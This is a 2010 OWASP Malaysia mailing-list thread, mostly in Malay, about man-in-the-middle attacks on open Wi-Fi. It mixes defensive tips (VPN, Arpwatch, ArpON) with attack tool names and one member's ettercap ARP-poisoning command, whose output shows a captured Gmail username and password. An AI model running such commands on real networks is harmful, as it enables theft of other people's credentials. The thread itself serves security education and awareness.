Yeah, Tapi end-user biasa tak concern pasal nak guna tools ni.. Janji dpt masuk site.. desperate nak FB.. hehe Mcm mana dengan kelas?
On Sat, Sep 25, 2010 at 2:35 AM, Hasanuddin Abu Bakar < [email protected]> wrote: > On Sat, Sep 25, 2010 at 2:16 AM, MASOKIS <[email protected]> wrote: > > kat indonesia siap buat bengkel lagi..wow... > > firewall tak mampu nak halang ke MiTM ni ? > > > > Arpwatch untuk detect dan report ARP spoofing > http://en.wikipedia.org/wiki/Arpwatch > ArpON untuk detect dan block ARP spoofing http://arpon.sourceforge.net/ > > > > > > On Sat, Sep 25, 2010 at 1:34 AM, Faizul <[email protected]> wrote: > >> > >> kalau nak selamat sekurangnya ada jugak la antivirus, internet security > >> dan lain-lain. > >> sekurang-kurangnya mencabar sikit kalau sapa nak hack ke nak apa ke. > >> ini kosong je, bogel sapa tak stim. kalau askar nak gi perang bogel tak > >> pakai baju pun paling ciput ada rifle dengan peluru jugak. > >> guna broadband sendiri pun orang boleh tengok jgk, tp kena ada device > yang > >> canggih baru boleh, spisis gsm interceptor dan lain-lain. > >> ada terbaca pasal GSM hacking ? A5/1 ? USRP ? openbts ? benda tu pun > ramai > >> jugak berminat. kat indonesia ramai dah try main-main dgn benda ni. > >> > >> > >> On Sat, Sep 25, 2010 at 12:18 AM, Amir Haris <[email protected]> > wrote: > >>> > >>> This paper is quite old, but it helps us to understand on how to detect > >>> sniffer. > >>> www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf > >>> > >>> > >>> On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran > >>> <[email protected]> wrote: > >>>> > >>>> Hebat Guru Faizul nie buat live hack.. . memandangkan open network > >>>> memang bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai > yang > >>>> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar > akan > >>>> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh > pengguna yang > >>>> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka > tak > >>>> tau. > >>>> > >>>> Tapi please consider use VPN kalau nak masuk ke open network nie.. > maybe > >>>> akan banyak membantu anda untuk protect laptop anda dari di sniffer > yang > >>>> senantiasa membaca packet anda... > >>>> > >>>> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum > >>>> connect ke wifi tersebut. Pastikan yer!! > >>>> > >>>> Kalau untuk pengguna window tegar boleh try guna Hotspot Shield ini. > >>>> banyak kebaikannya... amin!!! dah ada untuk iphone la .. boleh > download > >>>> untuk peminat2 iphone. :) > >>>> > >>>> Pastikan laptop anda tidak ada buat public file sharing.. pastikan > >>>> tau!!! > >>>> > >>>> Last jangan connect terlampau lama dengan open network ni lagi lama > anda > >>>> connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak > leka > >>>> dan lalai yer!!! > >>>> > >>>> Sebenarnya banyak lagi software yang boleh digunakan untuk protect > >>>> laptop anda jika anda banyak explore dan menyelidik sedikit sebanyak > tentang > >>>> cara nak protect laptop anda especially untuk pengguna windows.. tapi > jangan > >>>> sangka pulak pengguna OS lain boleh terlepas... huhuhu. > >>>> P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch, > Arpsnmp atau > >>>> DecaffeinatID anda mesti menyukainya.. :P > >>>> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <[email protected]> wrote: > >>>>> > >>>>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah > target > >>>>> dan 254 adalah gateway > >>>>> > >>>>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau > >>>>> dragon > >>>>> > >>>>> Listening on eth0... (Ethernet) > >>>>> > >>>>> eth0 -> 00:0C:29:97:59:E4 10.1.1.1 255.255.255.0 > >>>>> > >>>>> Privileges dropped to UID 0 GID 0... > >>>>> > >>>>> 28 plugins > >>>>> 39 protocol dissectors > >>>>> 53 ports monitored > >>>>> 7587 mac vendor fingerprint > >>>>> 1698 tcp OS fingerprint > >>>>> 2183 known services > >>>>> > >>>>> Scanning for merged targets (2 hosts)... > >>>>> > >>>>> * |==================================================>| 100.00 % > >>>>> > >>>>> 2 hosts added to the hosts list... > >>>>> > >>>>> ARP poisoning victims: > >>>>> > >>>>> GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92 > >>>>> > >>>>> GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6 > >>>>> Starting Unified sniffing... > >>>>> > >>>>> > >>>>> Text only Interface activated... > >>>>> Hit 'h' for inline help > >>>>> > >>>>> HTTP : 74.125.127.99:443 -> USER: 9w2pju PASS: selamathariraya > INFO: > >>>>> > https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3 > >>>>> > >>>>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <[email protected]> > >>>>> wrote: > >>>>>> > >>>>>> Haris, > >>>>>> > >>>>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar... > >>>>>> > >>>>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <[email protected] > > > >>>>>> wrote: > >>>>>>> > >>>>>>> Based on the blog post, plenty of tools can be used to perform > such > >>>>>>> attacks. Nowadays tools are getting more "user friendly" and yeah > >>>>>>> since > >>>>>>> he's using insecure Wifi facility -visible network packets/traffics > - > >>>>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with > >>>>>>> ferret and hamster is much more easier. But based on the symptoms > or > >>>>>>> the > >>>>>>> screenshots, it is more monkey in the middle attack compared to > >>>>>>> sidejacking (I prefer this one). > >>>>>>> > >>>>>>> So, never access your private accounts using insecure or open ap > >>>>>>> wireless environment. Guna la broadband.. :D > >>>>>>> > >>>>>>> p/s: besides I believe nobody actually read/understand/concern on > the > >>>>>>> warning popups regarding the cert validity. Usually we just click > >>>>>>> "Add > >>>>>>> exception" and "proceed" :D > >>>>>>> > >>>>>>> That's my 2 halala > >>>>>>> > >>>>>>> Thanks > >>>>>>> > >>>>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote: > >>>>>>> > There is https/ssl mitm in the cain & abel using fake > >>>>>>> > private/public key. It intercepts the ssl handshake and providing > the fake > >>>>>>> > key (if the key is not trusted) to the client. In my previous > test, my > >>>>>>> > friend realized a fake ssl for maybank site when I'm running the > attack, and > >>>>>>> > he told me maybank has been hacked (but not). For wireless (not > ethernet) > >>>>>>> > layer 2, there is utility like airpwn and karma for this kind of > attack. I > >>>>>>> > haven't read yet the blog but to answer first the question. > Wallahualam. > >>>>>>> > Sent from my BlackBerry® smartphone > >>>>>>> > > >>>>>>> > -----Original Message----- > >>>>>>> > From: Harisfazillah Jamel <[email protected]> > >>>>>>> > Sender: [email protected] > >>>>>>> > Date: Fri, 24 Sep 2010 19:21:31 > >>>>>>> > To: owasp-malaysia<[email protected]> > >>>>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless > >>>>>>> > > >>>>>>> > Tittle should be man in the minddle attack.. > >>>>>>> > > >>>>>>> > ettercap can be used to capture packet. But its hard to get our > >>>>>>> > password in HTTPS protocol. I believe a kind of proxy is used for > >>>>>>> > this. > >>>>>>> > > >>>>>>> > Any idea what kind of proxy? > >>>>>>> > > >>>>>>> > > >>>>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote: > >>>>>>> >> ARP poisoning can be used.ettercap > >>>>>>> >> > >>>>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" > >>>>>>> >> <[email protected]> wrote: > >>>>>>> >>> Assalamualaikum and salam sejahtera, > >>>>>>> >>> > >>>>>>> >>> Would like to share this blog post. > >>>>>>> >>> > >>>>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/ > >>>>>>> >>> > >>>>>>> >>> How man in the middle attack can be used in this case? > >>>>>>> >>> > >>>>>>> >>> Thanks. > >>>>>>> > _______________________________________________ > >>>>>>> > Owasp-Malaysia mailing list > >>>>>>> > [email protected] > >>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>>>>> > > >>>>>>> > OWASP Malaysia Wiki > >>>>>>> > http://www.owasp.org/index.php/Malaysia > >>>>>>> > > >>>>>>> > OWASP Malaysia Wiki Facebook > >>>>>>> > > >>>>>>> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>>>>>> > _______________________________________________ > >>>>>>> > Owasp-Malaysia mailing list > >>>>>>> > [email protected] > >>>>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>>>>> > > >>>>>>> > OWASP Malaysia Wiki > >>>>>>> > http://www.owasp.org/index.php/Malaysia > >>>>>>> > > >>>>>>> > OWASP Malaysia Wiki Facebook > >>>>>>> > > >>>>>>> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>>>>>> > > >>>>>>> > >>>>>>> _______________________________________________ > >>>>>>> Owasp-Malaysia mailing list > >>>>>>> [email protected] > >>>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>>>>> > >>>>>>> OWASP Malaysia Wiki > >>>>>>> http://www.owasp.org/index.php/Malaysia > >>>>>>> > >>>>>>> OWASP Malaysia Wiki Facebook > >>>>>>> > >>>>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>>>>> > >>>>>> > >>>>>> _______________________________________________ > >>>>>> Owasp-Malaysia mailing list > >>>>>> [email protected] > >>>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>>>> > >>>>>> OWASP Malaysia Wiki > >>>>>> http://www.owasp.org/index.php/Malaysia > >>>>>> > >>>>>> OWASP Malaysia Wiki Facebook > >>>>>> > >>>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>>>> > >>>>> > >>>>> > >>>>> -- > >>>>> 73 de 9W2PJU > >>>>> > >>>>> http://9w2pju.blogspot.com > >>>>> > >>>>> > >>>>> _______________________________________________ > >>>>> Owasp-Malaysia mailing list > >>>>> [email protected] > >>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>>> > >>>>> OWASP Malaysia Wiki > >>>>> http://www.owasp.org/index.php/Malaysia > >>>>> > >>>>> OWASP Malaysia Wiki Facebook > >>>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>>> > >>>> Mohd Fazli Azran > >>>> Pengguna Internet Tegar > >>>> _______________________________________________ > >>>> Owasp-Malaysia mailing list > >>>> [email protected] > >>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>>> > >>>> OWASP Malaysia Wiki > >>>> http://www.owasp.org/index.php/Malaysia > >>>> > >>>> OWASP Malaysia Wiki Facebook > >>>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> > >>> > >>> _______________________________________________ > >>> Owasp-Malaysia mailing list > >>> [email protected] > >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> > >>> OWASP Malaysia Wiki > >>> http://www.owasp.org/index.php/Malaysia > >>> > >>> OWASP Malaysia Wiki Facebook > >>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> > >> > >> > >> -- > >> 73 de 9W2PJU > >> > >> http://9w2pju.blogspot.com > >> > >> > >> _______________________________________________ > >> Owasp-Malaysia mailing list > >> [email protected] > >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> > >> OWASP Malaysia Wiki > >> http://www.owasp.org/index.php/Malaysia > >> > >> OWASP Malaysia Wiki Facebook > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > > > > > > -- > >>> HTTP://WWW.MASOKIS.COM << > > > > > > _______________________________________________ > > Owasp-Malaysia mailing list > > [email protected] > > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > > > OWASP Malaysia Wiki > > http://www.owasp.org/index.php/Malaysia > > > > OWASP Malaysia Wiki Facebook > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
